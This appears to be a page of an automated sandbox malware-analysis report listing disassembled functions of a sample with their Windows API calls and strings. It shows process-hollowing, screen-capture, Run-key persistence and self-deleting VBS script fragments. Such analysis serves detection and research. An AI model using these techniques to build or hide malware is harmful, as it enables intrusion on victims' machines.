                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                  • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                  Function 0212D2FF Relevance: .2, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction ID: b9c30c8eee15236c683d0f9a0ed1c5277191b4890058b845314ab7d0d91400b4
                                                  • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                  • Instruction Fuzzy Hash: 7E61A9B12C07389ADB3C9A28FA51BBF2399EB41708F04041AF842DB6C0D741E97DC756
                                                  Function 0212D0A2 Relevance: .2, Instructions: 237COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction ID: a770f8f97280ad02b5956e28c4c8c7c6121a0f67d6df6229c1649fee72aa02bf
                                                  • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                                                  • Instruction Fuzzy Hash: 306167717C06385BDB3C9A68F895BBE2399DB09308F140419F842CBA90D711D97EC659
                                                  Function 0043C9DD Relevance: .2, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                  • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                  • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                  Function 00426FAD Relevance: .2, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                  • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                  Function 02117214 Relevance: .2, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction ID: 6a55e7dcbed9dae2380acebe472aba1bc4163c74424113965d09cfdecc579334
                                                  • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                  • Instruction Fuzzy Hash: 2F613B329483459FC308DF24D581A5FB7E9EFD8714F440D2DF49996290EB31EA098F82
                                                  Function 00437150 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                  Function 021273B7 Relevance: .1, Instructions: 76COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 306c72901d2b26ce0cc09f0b93c105b93af265b8bb3bf4a5d83f020a483628fd
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: D7110B777C00F143D615862DE4B42B7EB85EBC512872D4676F4418B7D8D322A17FD500
                                                  Function 00530083 Relevance: .1, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295009749.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_530000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: d6bd96fc0c5ccf4b7f84a987fe9495236d7fc5d98947affefa9051470a771138
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: 9211AC72340200AFDB44DE55DCD5FA677EAFB88320F298065ED08CB352D676E802C760
                                                  Function 020F0D90 Relevance: .0, Instructions: 43COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2295418897.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_20f0000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: 4524214b148ab43ddff2c3a4e56364f4d43a0700c24f520c9d4403447d2986ae
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: DF01F7736517008FDFA1CF20C804BAA33E6FBC5206F0540A4DA0697646E370A8418B80
                                                  Function 00417F9F Relevance: 52.8, APIs: 29, Strings: 1, Instructions: 324windowmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                    • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                  • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                  • DeleteDC.GDI32(?), ref: 0041805D
                                                  • DeleteDC.GDI32(00000000), ref: 00418060
                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                  • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                  • GetCursorInfo.USER32(?), ref: 004180B5
                                                  • GetIconInfo.USER32(?,?), ref: 004180CB
                                                  • DeleteObject.GDI32(?), ref: 004180FA
                                                  • DeleteObject.GDI32(?), ref: 00418107
                                                  • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                  • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                  • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                  • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                  • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                  • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                  • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                  • DeleteDC.GDI32(?), ref: 0041827F
                                                  • DeleteDC.GDI32(00000000), ref: 00418282
                                                  • DeleteObject.GDI32(00000000), ref: 00418285
                                                  • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                  • DeleteObject.GDI32(00000000), ref: 00418344
                                                  • GlobalFree.KERNEL32(?), ref: 0041834B
                                                  • DeleteDC.GDI32(?), ref: 0041835B
                                                  • DeleteDC.GDI32(00000000), ref: 00418366
                                                  • DeleteDC.GDI32(?), ref: 00418398
                                                  • DeleteDC.GDI32(00000000), ref: 0041839B
                                                  • DeleteObject.GDI32(?), ref: 004183A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconInfoLocal$BitmapBitsCursorDisplayDrawEnumSelectSettingsStretch
                                                  • String ID: DISPLAY
                                                  • API String ID: 1352755160-865373369
                                                  • Opcode ID: b4c6bf4e52edfc03422411bcd894cc50d6d8da2302d45061974d14fb7e87f350
                                                  • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                  • Opcode Fuzzy Hash: b4c6bf4e52edfc03422411bcd894cc50d6d8da2302d45061974d14fb7e87f350
                                                  • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                  Function 00417245 Relevance: 49.3, APIs: 22, Strings: 6, Instructions: 290libraryloaderthreadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                  • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                  • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                  • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                  • ResumeThread.KERNEL32(?), ref: 00417582
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                  • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                  • GetLastError.KERNEL32 ref: 004175C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                  • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                  • API String ID: 4188446516-108836778
                                                  • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                  • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                  • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                  Function 004112B5 Relevance: 43.9, APIs: 17, Strings: 8, Instructions: 189synchronizationsleepfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                  • ExitProcess.KERNEL32 ref: 0041151D
                                                    • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
                                                    • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
                                                    • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                  • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                    • Part of subcall function 004127D5: RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                  • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                  • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                  • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                  • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                    • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                    • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5FF
                                                    • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B60C
                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                  • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                    • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                  • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                  • API String ID: 4250697656-2665858469
                                                  • Opcode ID: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                  • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                  • Opcode Fuzzy Hash: b68df8224523070e2f82cd34dc7b2adce00a37accb578c29d62ccc5e9000c55b
                                                  • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                  Function 0040C28E Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 282registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                    • Part of subcall function 0041B58F: CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6A5,00000000,00000000,00000000), ref: 0041B5CE
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
                                                  • ExitProcess.KERNEL32 ref: 0040C63E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                  • API String ID: 1861856835-3168347843
                                                  • Opcode ID: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                  • Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
                                                  • Opcode Fuzzy Hash: 1fca09a02b8493e53294f51d4634f72964b40bbef437048ec22e150e28ca3ccf
                                                  • Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
                                                  Function 0040BF04 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 260registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,?,0040C67D), ref: 004116A9
                                                    • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF,?,0040C67D), ref: 004116BC
                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                  • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                  • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(004099A9,00000000,00000000,?,0040C2B0,?,00000000), ref: 0040AFC9
                                                    • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                    • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(00409993,00000000,?,0040C2B0,?,00000000), ref: 0040AFE3
                                                    • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,00403A40), ref: 0041AB5F
                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                  • ExitProcess.KERNEL32 ref: 0040C287
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                  • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                  • API String ID: 3797177996-1998216422
                                                  • Opcode ID: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                  • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                  • Opcode Fuzzy Hash: c4cc4d00899e4284936be169aaff6719d95b62d3fffb22ecd15678fbb4326d45
                                                  • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
                                                  Function 0041A1BB Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
                                                  • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
                                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
                                                  • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
                                                  • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
                                                  • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
                                                  • SetEvent.KERNEL32 ref: 0041A38A
                                                  • WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
                                                  • CloseHandle.KERNEL32 ref: 0041A3AB
                                                  • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
                                                  • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2294667849.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2294667849.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2294667849.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_yPIOW6yoPi.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                  • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$>G
                                                  • API String ID: 738084811-1408154895
